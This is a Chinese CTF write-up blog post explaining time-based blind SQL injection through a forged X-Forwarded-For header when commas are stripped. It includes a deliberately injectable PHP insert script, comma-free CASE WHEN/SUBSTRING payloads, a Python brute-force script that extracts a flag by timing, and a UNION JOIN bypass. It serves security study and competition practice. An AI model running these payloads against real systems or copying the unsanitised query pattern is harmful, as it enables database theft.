wonderkun's|blog

share with you!

05/31
14:05
hack_ctf

mysql无逗号的注入技巧

明天就要考试了,然而我还在任性的写代码,真是该剁手,剁手啊…

在一个 ctf比赛中,遇到这样一个注入题:

用户的ip可以用x-forwarded-for来伪造,然后把ip存储到数据库中去,对ip没有进行任何过滤,存在注入,但是有一个限制就是:  用‘,’逗号对ip地址进行分割,仅仅取逗号前面的第一部分内容。

然后:没有报错,没有回显,没有bool,只有延时。 送一个字,坑。。。。。

比赛的时候,就各种纠结,想着怎么绕过逗号,没想出来,比赛结束之后,仔细想想,终于搞明白了,做以下的总结。

据我猜测,后台代码可能是这样的:


<?php
error_reporting(0);

function getIp(){
    $ip = '';
if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])){
      $ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
}else{
     $ip = $_SERVER['REMOTE_ADDR'];
}
   $ip_arr = explode(',', $ip);
   return $ip_arr[0];
}

$host="localhost";
$user="root";
$pass="root";
$db="sangebaimao";

$connect = mysql_connect($host, $user, $pass) or die("Unable to connect");

mysql_select_db($db) or die("Unable to select database");

$ip = getIp();
echo 'your ip is :'.$ip;
$sql="insert into client_ip (ip) values ('$ip')";
mysql_query($sql);


?>

写一下我的数据库的表结构:

CREATE TABLE IF NOT EXISTS `client_ip` (
 `id` int(11) NOT NULL AUTO_INCREMENT,
 `ip` varchar(200) DEFAULT NULL,
 PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=gbk AUTO_INCREMENT=34 ;

CREATE TABLE IF NOT EXISTS `flag` (
 `flag` varchar(32) DEFAULT NULL
) ENGINE=MyISAM DEFAULT CHARSET=gbk;

INSERT INTO `flag` (`flag`) VALUES
('327a6c4304ad5938eaf0efb6cc3e53dc');

我的目标是注出来flag表中的flag字段。

分析一下:

因为没有报错,没有回显。所以只能是延时盲注。

测试一下:

x-forwarded-for: 10.20.0.12'+sleep(5) and '1'='1

果真延时了,注入是存在的,但是怎么出数据呢???
没有逗号,所以if函数就不能用了。
那用另外一个:

select case when (条件) then 代码1 else 代码 2 end  

把判断搞定了,但是怎么截取字符串呢? 截取字符串函数貌似都需要逗号啊!!!

百度了好久,才知道可以这样玩:

 select substring((select user()) from 1 for 1);  #第一种方法
 select substring((select user()) from -1);  #第二种方法

QQ截图20160531142402

截取字符串的函数有了,判断也有了。那就搞定了:

找到两种payload


insert into client_ip (ip) values ('ip'+(select case when (substring((select user()) from 1 for 1)='e') then sleep(3) else 0 end));  --第一种payload

insert into client_ip (ip) values ('ip'+(select case when (substring((select  user()) from -1)='t') then sleep(3) else 0 end));  --第二种payload

接下来就是写个脚本跑了:

#coding:utf-8 
import requests 
maystr="0987654321qwertyuiopasdfghjklzxcvbnm"
url="http://127.0.0.1/sql/sql.php"
flag=""
for i in range(32):
   for str in maystr:
     headers={"x-forwarded-for":"127.0.0.1'+"+"(select case when (substring((select flag from flag ) from %d for 1 )='%s') then sleep(6) else sleep(0) end ) and '1'='1"%(i+1,str)}
 # proxy={"http":"http://127.0.0.1:8080"}
 # res=requests.get(url,headers=headers,timeout=3)
     try: 
         res=requests.get(url,headers=headers,timeout=4)
     except requests.exceptions.ReadTimeout,e:
         flag=flag+str
         print "flag:",flag
         break 
     except KeyboardInterrupt,e:
        exit(0)
     else:
        pass
 # rint i+1,str

再增加一种绕过逗号的姿势,比如说:


select id,ip from client_ip where 1>2  union select * from  ( (select user())a JOIN  (select version())b );  --这个用于union 查询的注入

QQ截图20160531151817